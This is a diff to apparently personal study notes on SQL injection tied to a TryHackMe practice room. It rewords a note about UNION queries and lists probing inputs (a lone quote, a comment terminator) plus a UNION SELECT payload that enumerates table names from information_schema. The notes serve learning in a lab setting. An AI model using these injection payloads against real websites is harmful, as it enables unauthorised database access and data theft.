QuentinRa/blog.quentinra.dev/cyber/cybersecurity/notes.md

 ## SQLi

 * https://tryhackme.com/room/sqlinjectionlm
-* UNION: same type too!
+* UNION: same "type" too / not for SQL, but for the website
 * `'` to discover if an attack is possible
 * `';-- -`
 * `0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'`: `article,staff_users`